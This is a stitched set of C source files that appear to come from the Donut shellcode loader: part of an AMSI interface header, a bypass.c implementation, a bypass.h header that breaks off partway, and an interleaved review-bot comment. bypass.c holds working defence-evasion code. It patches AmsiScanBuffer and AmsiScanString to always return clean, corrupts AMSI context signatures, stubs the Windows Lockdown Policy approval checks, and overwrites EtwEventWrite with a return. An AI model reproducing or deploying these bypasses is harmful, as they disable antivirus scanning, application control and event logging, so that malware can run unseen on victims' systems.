128 void ( STDMETHODCALLTYPE *CloseSession )(
129 IAntimalwareProvider * This,
130 ULONGLONG session);
131
132 HRESULT ( STDMETHODCALLTYPE *DisplayName )(
133 IAntimalwareProvider * This,
134 LPWSTR *displayName);
135
136 END_INTERFACE
137 } IAntimalwareProviderVtbl;
138
139 typedef struct _IAntimalwareProvider {
140 IAntimalwareProviderVtbl *lpVtbl;
141 } AntimalwareProvider;
142
143 typedef struct IAntimalwareVtbl {
144 BEGIN_INTERFACE
145
146 HRESULT ( STDMETHODCALLTYPE *QueryInterface)(
147 IAntimalware *This,
148 REFIID riid,
149 void **ppvObject);
150
151 ULONG ( STDMETHODCALLTYPE *AddRef )(
152 IAntimalware * This);
153
154 ULONG ( STDMETHODCALLTYPE *Release )(
155 IAntimalware * This);
156
157 HRESULT ( STDMETHODCALLTYPE *Scan )(
158 IAntimalware * This,
159 IAmsiStream *stream,
160 AMSI_RESULT *result,
161 IAntimalwareProvider **provider);
162
163 void ( STDMETHODCALLTYPE *CloseSession )(
164 IAntimalware * This,
165 ULONGLONG session);
166
167 END_INTERFACE
168 } IAntimalwareVtbl;
169
170 typedef struct _IAntimalware {
171 IAntimalwareVtbl *lpVtbl;
172 } Antimalware;
173
174 typedef struct tagHAMSICONTEXT {
175 DWORD Signature; // "AMSI" or 0x49534D41
176 PWCHAR AppName; // set by AmsiInitialize
177 IAntimalware *Antimalware; // set by AmsiInitialize
178 DWORD SessionCount; // increased by AmsiOpenSession
179 } _HAMSICONTEXT, *_PHAMSICONTEXT;
180
181 #endif
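Review bot: This header hand-copies declarations that the Windows SDK already ships in its own AMSI header, and the copy is incomplete: `AMSI_RESULT` goes straight from `AMSI_RESULT_NOT_DETECTED` to `AMSI_RESULT_DETECTED`, while the SDK enum also defines `AMSI_RESULT_BLOCKED_BY_ADMIN_START` (0x4000) and `AMSI_RESULT_BLOCKED_BY_ADMIN_END` (0x4fff). The `DECLARE_HANDLE` lines and the enum/interface names would most likely collide with the SDK header if both were included in one translation unit, so a top-of-file comment like `// local copy of SDK AMSI declarations; do not combine with the SDK header` is worth adding. `tagHAMSICONTEXT` is not a public SDK type, so its field order is an assumption about one implementation. A comment such as `// not an SDK type: layout observed, undocumented, may differ between Windows builds` would keep readers from treating it as a stable contract.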
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include "bypass.h"
32
33 #if defined(BYPASS_AMSI_A)
34 // This is where you may define your own AMSI bypass.
35 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_AMSI_A defined.
36 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
37 return TRUE;
38 }
39
40 #elif defined(BYPASS_AMSI_B)
41 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
42 HRESULT WINAPI AmsiScanBufferStub(
43 HAMSICONTEXT amsiContext,
44 PVOID buffer,
45 ULONG length,
46 LPCWSTR contentName,
47 HAMSISESSION amsiSession,
48 AMSI_RESULT *result)
49 {
50 *result = AMSI_RESULT_CLEAN;
51 return S_OK;
52 }
53
54 // This function is never called. It's simply used to calculate
55 // the length of AmsiScanBufferStub above.
56 //
57 // The reason it performs a multiplication is because MSVC can identify
58 // functions that perform the same operation and eliminate them
59 // from the compiled code. Null subroutines are eliminated, so the body of
60 // function needs to do something.
61
62 int AmsiScanBufferStubEnd(int a, int b) {
63 return a * b;
64 }
65
66 // fake function that always returns S_OK and AMSI_RESULT_CLEAN
67 HRESULT WINAPI AmsiScanStringStub(
68 HAMSICONTEXT amsiContext,
69 LPCWSTR string,
70 LPCWSTR contentName,
71 HAMSISESSION amsiSession,
72 AMSI_RESULT *result)
73 {
74 *result = AMSI_RESULT_CLEAN;
75 return S_OK;
76 }
77
78 int AmsiScanStringStubEnd(int a, int b) {
79 return a + b;
80 }
81
82 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
83 HMODULE dll;
84 DWORD len, op, t;
85 LPVOID cs;
86 SIZE_T rs;
87 PVOID ba;
88 NTSTATUS status;
89 PSYSCALL_LIST syscall_list;
90
91 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
92
93 // try load amsi. if unable, assume DLL doesn't exist
94 // and return TRUE to indicate it's okay to continue
95 dll = xGetLibAddress(inst, inst->amsi);
96 if(dll == NULL) return TRUE;
97
98 // resolve address of AmsiScanBuffer. if not found,
99 // return FALSE because it should exist ...
100 cs = xGetProcAddress(inst, dll, inst->amsiScanBuf, 0);
101 if(cs == NULL) return FALSE;
102
103 // calculate length of stub
104 len = (ULONG_PTR)AmsiScanBufferStubEnd -
105 (ULONG_PTR)AmsiScanBufferStub;
106
107 DPRINT("Length of AmsiScanBufferStub is %" PRIi32 " bytes.", len);
108
109 // check for negative length. this would only happen when
110 // compiler decides to re-order functions.
111 if((int)len < 0) return FALSE;
112
113 // make the memory writeable. return FALSE on error
114 ba = cs;
115 rs = len;
116 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
117 if(!NT_SUCCESS(status)) return FALSE;
118
119 DPRINT("Overwriting AmsiScanBuffer");
120 // over write with virtual address of stub
121 Memcpy(cs, ADR(PCHAR, AmsiScanBufferStub), len);
122 // set memory back to original protection
123 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
124
125 // resolve address of AmsiScanString. if not found,
126 // return FALSE because it should exist ...
127 cs = xGetProcAddress(inst, dll, inst->amsiScanStr, 0);
128 if(cs == NULL) return FALSE;
129
130 // calculate length of stub
131 len = (ULONG_PTR)AmsiScanStringStubEnd -
132 (ULONG_PTR)AmsiScanStringStub;
133
134 DPRINT("Length of AmsiScanStringStub is %" PRIi32 " bytes.", len);
135
136 // check for negative length. this would only happen when
137 // compiler decides to re-order functions.
138 if((int)len < 0) return FALSE;
139
140 // make the memory writeable
141 ba = cs;
142 rs = len;
143 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
144 if(!NT_SUCCESS(status)) return FALSE;
145
146 DPRINT("Overwriting AmsiScanString");
147 // over write with virtual address of stub
148 Memcpy(cs, ADR(PCHAR, AmsiScanStringStub), len);
149 // set memory back to original protection
150 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
151
152 return TRUE;
153 }
154
155 #elif defined(BYPASS_AMSI_C)
156 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
157 HMODULE dll;
158 PBYTE cs;
159 DWORD i, op, t;
160 BOOL disabled = FALSE;
161 PDWORD Signature;
162 SIZE_T rs;
163 PVOID ba;
164 NTSTATUS status;
165 PSYSCALL_LIST syscall_list;
166
167 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
168
169 // try load amsi. if unable to load, assume
170 // it doesn't exist and return TRUE to indicate
171 // it's okay to continue.
172 dll = xGetLibAddress(inst, inst->amsi);
173 if(dll == NULL) return TRUE;
174
175 // resolve address of AmsiScanBuffer. if unable, return
176 // FALSE because it should exist.
177 cs = (PBYTE)xGetProcAddress(inst, dll, inst->amsiScanBuf, 0);
178 if(cs == NULL) return FALSE;
179
180 // scan for signature
181 for(i=0;;i++) {
182 Signature = (PDWORD)&cs[i];
183 // is it "AMSI"?
184 if(*Signature == *(PDWORD)inst->amsi) {
185 // set memory protection for write access
186 ba = cs;
187 rs = sizeof(DWORD);
188 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
189 if(!NT_SUCCESS(status)) return FALSE;
190
191 // change signature
192 *Signature++;
193
194 // set memory back to original protection
195 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
196 disabled = TRUE;
197 break;
198 }
199 }
200 return disabled;
201 }
202
203 #elif defined(BYPASS_AMSI_D)
204 // Attempt to find AMSI context in .data section of CLR.dll
205 // Could also scan PEB.ProcessHeap for this..
206 // Disabling AMSI via AMSI context is based on idea by Matt Graeber
207 // https://gist.github.com/mattifestation/ef0132ba4ae3cc136914da32a88106b9
208
209 BOOL DisableAMSI(PDONUT_INSTANCE inst) {
210 LPVOID clr;
211 BOOL disabled = FALSE;
212 PIMAGE_DOS_HEADER dos;
213 PIMAGE_NT_HEADERS nt;
214 PIMAGE_SECTION_HEADER sh;
215 DWORD i, j, res;
216 PBYTE ds;
217 MEMORY_BASIC_INFORMATION mbi;
218 _PHAMSICONTEXT ctx;
219 PSYSCALL_LIST syscall_list;
220
221 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
222
223 // get address of CLR.dll. if unable, this
224 // probably isn't a dotnet assembly being loaded
225 clr = inst->api.GetModuleHandleA(inst->clr);
226 if(clr == NULL) return FALSE;
227
228 dos = (PIMAGE_DOS_HEADER)clr;
229 nt = RVA2VA(PIMAGE_NT_HEADERS, clr, dos->e_lfanew);
230 sh = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader +
231 nt->FileHeader.SizeOfOptionalHeader);
232
233 // scan all writeable segments while disabled == FALSE
234 for(i = 0;
235 i < nt->FileHeader.NumberOfSections && !disabled;
236 i++)
237 {
238 // if this section is writeable, assume it's data
239 if (sh[i].Characteristics & IMAGE_SCN_MEM_WRITE) {
240 // scan section for pointers to the heap
241 ds = RVA2VA (PBYTE, clr, sh[i].VirtualAddress);
242
243 for(j = 0;
244 j < sh[i].Misc.VirtualSize - sizeof(ULONG_PTR);
245 j += sizeof(ULONG_PTR))
246 {
247 // get pointer
248 ULONG_PTR ptr = *(ULONG_PTR*)&ds[j];
249 // query if the pointer
250 status = NtQueryVirtualMemory(NtCurrentProcess(), (LPVOID)ptr, MemoryBasicInformation, &mbi, sizeof(mbi), NULL, syscall_list);
251 if (!NT_SUCCESS(status)) return FALSE;
252
253 // if it's a pointer to heap or stack
254 if ((mbi.State == MEM_COMMIT ) &&
255 (mbi.Type == MEM_PRIVATE ) &&
256 (mbi.Protect == PAGE_READWRITE))
257 {
258 ctx = (_PHAMSICONTEXT)ptr;
259 // check if it contains the signature
260 if(ctx->Signature == *(PDWORD*)inst->amsi) {
261 // corrupt it
262 ctx->Signature++;
263 disabled = TRUE;
264 break;
265 }
266 }
267 }
268 }
269 }
270 return disabled;
271 }
272 #endif
273
274 #if defined(BYPASS_WLDP_A)
275 // This is where you may define your own WLDP bypass.
276 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_WLDP_A defined.
277
278 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
279 return TRUE;
280 }
281
282 #elif defined(BYPASS_WLDP_B)
283
284 // fake function that always returns S_OK and isApproved = TRUE
285 HRESULT WINAPI WldpIsClassInApprovedListStub(
286 REFCLSID classID,
287 PWLDP_HOST_INFORMATION hostInformation,
288 PBOOL isApproved,
289 DWORD optionalFlags)
290 {
291 *isApproved = TRUE;
292 return S_OK;
293 }
294
295 // make sure prototype and code are different from other subroutines
296 // to avoid removal by MSVC
297 int WldpIsClassInApprovedListStubEnd(int a, int b) {
298 return a - b;
299 }
300
301 // fake function that always returns S_OK
302 HRESULT WINAPI WldpQueryDynamicCodeTrustStub(
303 HANDLE fileHandle,
304 PVOID baseImage,
305 ULONG ImageSize)
306 {
307 return S_OK;
308 }
309
310 int WldpQueryDynamicCodeTrustStubEnd(int a, int b) {
311 return a / b;
312 }
313
314 BOOL DisableWLDP(PDONUT_INSTANCE inst) {
315 HMODULE wldp;
316 DWORD len, op, t;
317 LPVOID cs;
318 SIZE_T rs;
319 PVOID ba;
320 NTSTATUS status;
321 PSYSCALL_LIST syscall_list;
322
323 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
324
325 // try load wldp. if unable, assume DLL doesn't exist
326 // and return TRUE to indicate it's okay to continue
327 wldp = xGetLibAddress(inst, inst->wldp);
328 if(wldp == NULL) return TRUE;
329
330 // resolve address of WldpQueryDynamicCodeTrust
331 // if not found, return FALSE because it should exist
332 cs = xGetProcAddress(inst, wldp, inst->wldpQuery, 0);
333 if(cs == NULL) return FALSE;
334
335 // calculate length of stub
336 len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
337 (ULONG_PTR)WldpQueryDynamicCodeTrustStub;
338
339 DPRINT("Length of WldpQueryDynamicCodeTrustStub is %" PRIi32 " bytes.", len);
340
341 // check for negative length. this would only happen when
342 // compiler decides to re-order functions.
343 if((int)len < 0) return FALSE;
344
345 // make the memory writeable. return FALSE on error
346 ba = cs;
347 rs = len;
348 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
349 if(!NT_SUCCESS(status)) return FALSE;
350
351 // overwrite with virtual address of stub
352 Memcpy(cs, ADR(PCHAR, WldpQueryDynamicCodeTrustStub), len);
353 // set back to original protection
354 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
355
356 // resolve address of WldpIsClassInApprovedList
357 // if not found, return FALSE because it should exist
358 cs = xGetProcAddress(inst, wldp, inst->wldpIsApproved, 0);
359 if(cs == NULL) return FALSE;
360
361 // calculate length of stub
362 len = (ULONG_PTR)WldpIsClassInApprovedListStubEnd -
363 (ULONG_PTR)WldpIsClassInApprovedListStub;
364
365 DPRINT("Length of WldpIsClassInApprovedListStub is %" PRIi32 " bytes.", len);
366
367 // check for negative length. this would only happen when
368 // compiler decides to re-order functions.
369 if((int)len < 0) return FALSE;
370
371 // make the memory writeable. return FALSE on error
372 ba = cs;
373 rs = len;
374 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
375 if(!NT_SUCCESS(status)) return FALSE;
376
377 // overwrite with virtual address of stub
378 Memcpy(cs, ADR(PCHAR, WldpIsClassInApprovedListStub), len);
379 // set back to original protection
380 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
381
382 return TRUE;
383 }
384 #endif
385
386 #if defined(BYPASS_ETW_A)
387 // This is where you may define your own ETW bypass.
388 // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_ETW_A defined.
389 BOOL DisableETW(PDONUT_INSTANCE inst) {
390 return TRUE;
391 }
392
393 #elif defined(BYPASS_ETW_B)
394 BOOL DisableETW(PDONUT_INSTANCE inst) {
395 HMODULE dll;
396 DWORD len, op, t;
397 LPVOID cs;
398 SIZE_T rs;
399 PVOID ba;
400 NTSTATUS status;
401 PSYSCALL_LIST syscall_list;
402
403 syscall_list = (PSYSCALL_LIST)(ULONG_PTR)inst->syscall_list;
404
405 // get a handle to ntdll.dll
406 dll = xGetLibAddress(inst, inst->ntdll);
407
408 // resolve address of EtwEventWrite
409 // if not found, return FALSE because it should exist
410 cs = xGetProcAddress(inst, dll, inst->etwEventWrite, 0);
411 if (cs == NULL) return FALSE;
412
413 #ifdef _WIN64
414 // make the memory writeable. return FALSE on error
415 ba = cs;
416 rs = 1;
417 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
418 if(!NT_SUCCESS(status)) return FALSE;
419
420 DPRINT("Overwriting EtwEventWrite");
421
422 // over write with "ret"
423 Memcpy(cs, inst->etwRet64, 1);
424
425 // set memory back to original protection
426 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
427 #else
428 // make the memory writeable. return FALSE on error
429 ba = cs;
430 rs = 4;
431 status = NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, PAGE_EXECUTE_READWRITE, &op, syscall_list);
432 if(!NT_SUCCESS(status)) return FALSE;
433
434 DPRINT("Overwriting EtwEventWrite");
435
436 // over write with "ret 14h"
437 Memcpy(cs, inst->etwRet32, 4);
438
439 // set memory back to original protection
440 NtProtectVirtualMemory(NtCurrentProcess(), &ba, &rs, op, &t, syscall_list);
441 #endif
442
443 return TRUE;
444
445 }
446
447 #endif
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef BYPASS_H
32 #define BYPASS_H
33
34 //#include <ntstatus.h>
35
36 // Disables Antimalware Scan Interface
37 BOOL DisableAMSI(PDONUT_INSTANCE);
38
39 // Disables Windows Lockdown Policy
40 BOOL DisableWLDP(PDONUT_INSTANCE);
41
42 // Disables ETW
43 BOOL DisableETW(PDONUT_INSTANCE);
44
45 // Use by BYPASS_WLDP_A
46 typedef enum _WLDP_HOST_ID {
47 WLDP_HOST_ID_UNKNOWN = 0,
48 WLDP_HOST_ID_GLOBAL = 1,
49 WLDP_HOST_ID_VBA = 2,
50 WLDP_HOST_ID_WSH = 3,
51 WLDP_HOST_ID_POWERSHELL = 4,
52 WLDP_HOST_ID_IE = 5,
53 WLDP_HOST_ID_MSI = 6,
54 WLDP_HOST_ID_MAX = 7
55 } WLDP_HOST_ID, * PWLDP_HOST_ID;
56
57 typedef struct _WLDP_HOST_INFORMATION {
58 DWORD dwRevision;
59 WLDP_HOST_ID dwHostId;
60 PCWSTR szSource;
61 HANDLE hSource;
62 } WLDP_HOST_INFORMATION, * PWLDP_HOST_INFORMATION;
63
64 // Used by BYPASS_ETW_B
65 typedef enum _SYSTEM_INFORMATION_CLASS
66 {
67 SystemBasicInformation, // q: SYSTEM_BASIC_INFORMATION
68 SystemProcessorInformation, // q: SYSTEM_PROCESSOR_INFORMATION
69 SystemPerformanceInformation, // q: SYSTEM_PERFORMANCE_INFORMATION
70 SystemTimeOfDayInformation, // q: SYSTEM_TIMEOFDAY_INFORMATION
71 SystemPathInformation, // not implemented
72 SystemProcessInformation, // q: SYSTEM_PROCESS_INFORMATION
73 SystemCallCountInformation, // q: SYSTEM_CALL_COUNT_INFORMATION
74 SystemDeviceInformation, // q: SYSTEM_DEVICE_INFORMATION
75 SystemProcessorPerformanceInformation, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION
76 SystemFlagsInformation, // q: SYSTEM_FLAGS_INFORMATION
77 SystemCallTimeInformation, // not implemented // SYSTEM_CALL_TIME_INFORMATION // 10
78 SystemModuleInformation, // q: RTL_PROCESS_MODULES
79 SystemLocksInformation, // q: RTL_PROCESS_LOCKS
80 SystemStackTraceInformation, // q: RTL_PROCESS_BACKTRACES
81 SystemPagedPoolInformation, // not implemented
82 SystemNonPagedPoolInformation, // not implemented
83 SystemHandleInformation, // q: SYSTEM_HANDLE_INFORMATION
84 SystemObjectInformation, // q: SYSTEM_OBJECTTYPE_INFORMATION mixed with SYSTEM_OBJECT_INFORMATION
85 SystemPageFileInformation, // q: SYSTEM_PAGEFILE_INFORMATION
86 SystemVdmInstemulInformation, // q: SYSTEM_VDM_INSTEMUL_INFO
87 SystemVdmBopInformation, // not implemented // 20
88 SystemFileCacheInformation, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemCache)
89 SystemPoolTagInformation, // q: SYSTEM_POOLTAG_INFORMATION
90 SystemInterruptInformation, // q: SYSTEM_INTERRUPT_INFORMATION
91 SystemDpcBehaviorInformation, // q: SYSTEM_DPC_BEHAVIOR_INFORMATION; s: SYSTEM_DPC_BEHAVIOR_INFORMATION (requires SeLoadDriverPrivilege)
92 SystemFullMemoryInformation, // not implemented
93 SystemLoadGdiDriverInformation, // s (kernel-mode only)
94 SystemUnloadGdiDriverInformation, // s (kernel-mode only)
95 SystemTimeAdjustmentInformation, // q: SYSTEM_QUERY_TIME_ADJUST_INFORMATION; s: SYSTEM_SET_TIME_ADJUST_INFORMATION (requires SeSystemtimePrivilege)
96 SystemSummaryMemoryInformation, // not implemented
97 SystemMirrorMemoryInformation, // s (requires license value "Kernel-MemoryMirroringSupported") (requires SeShutdownPrivilege) // 30
98 SystemPerformanceTraceInformation, // q; s: (type depends on EVENT_TRACE_INFORMATION_CLASS)
99 SystemObsolete0, // not implemented
100 SystemExceptionInformation, // q: SYSTEM_EXCEPTION_INFORMATION
101 SystemCrashDumpStateInformation, // s: SYSTEM_CRASH_DUMP_STATE_INFORMATION (requires SeDebugPrivilege)
102 SystemKernelDebuggerInformation, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION
103 SystemContextSwitchInformation, // q: SYSTEM_CONTEXT_SWITCH_INFORMATION
104 SystemRegistryQuotaInformation, // q: SYSTEM_REGISTRY_QUOTA_INFORMATION; s (requires SeIncreaseQuotaPrivilege)
105 SystemExtendServiceTableInformation, // s (requires SeLoadDriverPrivilege) // loads win32k only
106 SystemPrioritySeperation, // s (requires SeTcbPrivilege)
107 SystemVerifierAddDriverInformation, // s (requires SeDebugPrivilege) // 40
108 SystemVerifierRemoveDriverInformation, // s (requires SeDebugPrivilege)
109 SystemProcessorIdleInformation, // q: SYSTEM_PROCESSOR_IDLE_INFORMATION
110 SystemLegacyDriverInformation, // q: SYSTEM_LEGACY_DRIVER_INFORMATION
111 SystemCurrentTimeZoneInformation, // q; s: RTL_TIME_ZONE_INFORMATION
112 SystemLookasideInformation, // q: SYSTEM_LOOKASIDE_INFORMATION
113 SystemTimeSlipNotification, // s (requires SeSystemtimePrivilege)
114 SystemSessionCreate, // not implemented
115 SystemSessionDetach, // not implemented
116 SystemSessionInformation, // not implemented (SYSTEM_SESSION_INFORMATION)
117 SystemRangeStartInformation, // q: SYSTEM_RANGE_START_INFORMATION // 50
118 SystemVerifierInformation, // q: SYSTEM_VERIFIER_INFORMATION; s (requires SeDebugPrivilege)
119 SystemVerifierThunkExtend, // s (kernel-mode only)
120 SystemSessionProcessInformation, // q: SYSTEM_SESSION_PROCESS_INFORMATION
121 SystemLoadGdiDriverInSystemSpace, // s (kernel-mode only) (same as SystemLoadGdiDriverInformation)
122 SystemNumaProcessorMap, // q
123 SystemPrefetcherInformation, // q: PREFETCHER_INFORMATION; s: PREFETCHER_INFORMATION // PfSnQueryPrefetcherInformation
124 SystemExtendedProcessInformation, // q: SYSTEM_PROCESS_INFORMATION
125 SystemRecommendedSharedDataAlignment, // q
126 SystemComPlusPackage, // q; s
127 SystemNumaAvailableMemory, // 60
128 SystemProcessorPowerInformation, // q: SYSTEM_PROCESSOR_POWER_INFORMATION
129 SystemEmulationBasicInformation,
130 SystemEmulationProcessorInformation,
131 SystemExtendedHandleInformation, // q: SYSTEM_HANDLE_INFORMATION_EX
132 SystemLostDelayedWriteInformation, // q: ULONG
133 SystemBigPoolInformation, // q: SYSTEM_BIGPOOL_INFORMATION
134 SystemSessionPoolTagInformation, // q: SYSTEM_SESSION_POOLTAG_INFORMATION
135 SystemSessionMappedViewInformation, // q: SYSTEM_SESSION_MAPPED_VIEW_INFORMATION
136 SystemHotpatchInformation, // q; s: SYSTEM_HOTPATCH_CODE_INFORMATION
137 SystemObjectSecurityMode, // q: ULONG // 70
138 SystemWatchdogTimerHandler, // s (kernel-mode only)
139 SystemWatchdogTimerInformation, // q (kernel-mode only); s (kernel-mode only)
140 SystemLogicalProcessorInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION
141 SystemWow64SharedInformationObsolete, // not implemented
142 SystemRegisterFirmwareTableInformationHandler, // s: SYSTEM_FIRMWARE_TABLE_HANDLER // (kernel-mode only)
143 SystemFirmwareTableInformation, // SYSTEM_FIRMWARE_TABLE_INFORMATION
144 SystemModuleInformationEx, // q: RTL_PROCESS_MODULE_INFORMATION_EX
145 SystemVerifierTriageInformation, // not implemented
146 SystemSuperfetchInformation, // q; s: SUPERFETCH_INFORMATION // PfQuerySuperfetchInformation
147 SystemMemoryListInformation, // q: SYSTEM_MEMORY_LIST_INFORMATION; s: SYSTEM_MEMORY_LIST_COMMAND (requires SeProfileSingleProcessPrivilege) // 80
148 SystemFileCacheInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (same as SystemFileCacheInformation)
149 SystemThreadPriorityClientIdInformation, // s: SYSTEM_THREAD_CID_PRIORITY_INFORMATION (requires SeIncreaseBasePriorityPrivilege)
150 SystemProcessorIdleCycleTimeInformation, // q: SYSTEM_PROCESSOR_IDLE_CYCLE_TIME_INFORMATION[]
151 SystemVerifierCancellationInformation, // SYSTEM_VERIFIER_CANCELLATION_INFORMATION // name:wow64:whNT32QuerySystemVerifierCancellationInformation
152 SystemProcessorPowerInformationEx, // not implemented
153 SystemRefTraceInformation, // q; s: SYSTEM_REF_TRACE_INFORMATION // ObQueryRefTraceInformation
154 SystemSpecialPoolInformation, // q; s: SYSTEM_SPECIAL_POOL_INFORMATION (requires SeDebugPrivilege) // MmSpecialPoolTag, then MmSpecialPoolCatchOverruns != 0
155 SystemProcessIdInformation, // q: SYSTEM_PROCESS_ID_INFORMATION
156 SystemErrorPortInformation, // s (requires SeTcbPrivilege)
157 SystemBootEnvironmentInformation, // q: SYSTEM_BOOT_ENVIRONMENT_INFORMATION // 90
158 SystemHypervisorInformation, // q; s (kernel-mode only)
159 SystemVerifierInformationEx, // q; s: SYSTEM_VERIFIER_INFORMATION_EX
160 SystemTimeZoneInformation, // s (requires SeTimeZonePrivilege)
161 SystemImageFileExecutionOptionsInformation, // s: SYSTEM_IMAGE_FILE_EXECUTION_OPTIONS_INFORMATION (requires SeTcbPrivilege)
162 SystemCoverageInformation, // q; s // name:wow64:whNT32QuerySystemCoverageInformation; ExpCovQueryInformation
163 SystemPrefetchPatchInformation, // SYSTEM_PREFETCH_PATCH_INFORMATION
164 SystemVerifierFaultsInformation, // s: SYSTEM_VERIFIER_FAULTS_INFORMATION (requires SeDebugPrivilege)
165 SystemSystemPartitionInformation, // q: SYSTEM_SYSTEM_PARTITION_INFORMATION
166 SystemSystemDiskInformation, // q: SYSTEM_SYSTEM_DISK_INFORMATION
167 SystemProcessorPerformanceDistribution, // q: SYSTEM_PROCESSOR_PERFORMANCE_DISTRIBUTION // 100
168 SystemNumaProximityNodeInformation,
169 SystemDynamicTimeZoneInformation, // q; s (requires SeTimeZonePrivilege)
170 SystemCodeIntegrityInformation, // q: SYSTEM_CODEINTEGRITY_INFORMATION // SeCodeIntegrityQueryInformation
171 SystemProcessorMicrocodeUpdateInformation, // s: SYSTEM_PROCESSOR_MICROCODE_UPDATE_INFORMATION
172 SystemProcessorBrandString, // q // HaliQuerySystemInformation -> HalpGetProcessorBrandString, info class 23
173 SystemVirtualAddressInformation, // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) // MmQuerySystemVaInformation
174 SystemLogicalProcessorAndGroupInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX // since WIN7 // KeQueryLogicalProcessorRelationship
